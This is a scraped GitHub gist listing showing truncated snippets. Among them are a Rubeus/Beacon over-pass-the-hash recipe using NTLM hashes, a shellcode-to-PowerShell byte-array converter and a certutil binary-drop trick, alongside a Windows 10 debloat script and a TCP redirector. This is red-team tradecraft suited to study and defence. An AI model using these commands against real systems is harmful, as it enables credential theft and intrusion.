Skip to content

Instantly share code, notes, and snippets.


Chris Ross xorrior

View GitHub Profile
HarmJ0y / gist:dc379107cfb4aa7ef5c3ecbac0133a02
Last active Dec 9, 2020
Over-pass-the-hash with Rubeus and Beacon
View gist:dc379107cfb4aa7ef5c3ecbac0133a02
# grab a TGT b64 blob with a valid NTLM/rc4 (or /aes256:X)
beacon> execute-assembly /home/specter/Rubeus.exe asktgt /user:USER /rc4:NTLM_HASH
# decode the base64 blob to a binary .kirbi
$ base64 -d ticket.b64 > ticket.kirbi
# sacrificial logon session (to prevent the TGT from overwriting your current logon session's TGT)
beacon> make_token DOMAIN\USER PassWordDoesntMatter
alirobe / reclaimWindows10.ps1
Last active Feb 21, 2021
This Windows 10 Setup Script turns off a bunch of unnecessary Windows 10 telemetery, bloatware, & privacy things. Not guaranteed to catch everything. Review and tweak before running. Reboot after running. Scripts for reversing are included and commented. Fork of (different defaults). N.…
View reclaimWindows10.ps1
# Tweaked Win10 Initial Setup Script
# Primary Author: Disassembler <>
# Modified by: alirobe <> based on my personal preferences.
# Version: 2.20.2, 2018-09-14
# Primary Author Source:
# Tweaked Source:
# Tweak difference:
# @alirobe's version is a subset focused on safely disabling telemetry, some 'smart' features and 3rd party bloat ...
byt3bl33d3r /
Created Sep 13, 2015
Converts raw shellcode to a PowerShell compatible byte array (helpful when using custom shellcode with Invoke-Shellcode.ps1)
import sys
ps_shellcode = '@('
with open(sys.argv[1], 'rb') as shellcode:
byte =
while byte != '':
ps_shellcode += '0x{}, '.format(byte.encode('hex'))
byte =
mattifestation / drop_binary.bat
Created Jul 12, 2015
Drop binary data from the command line w/o needing PowerShell
View drop_binary.bat
echo -----BEGIN CERTIFICATE----- > encoded.txt
echo Just Base64 encode your binary data
echo TVoAAA== >> encoded.txt
echo -----END CERTIFICATE----- >> encoded.txt
certutil -decode encoded.txt decoded.bin
sivachandran /
Created Mar 4, 2012
A simple TCP redirector in python
#!/usr/bin/env python
import socket
import threading
import select
import sys
terminateAll = False
class ClientThread(threading.Thread):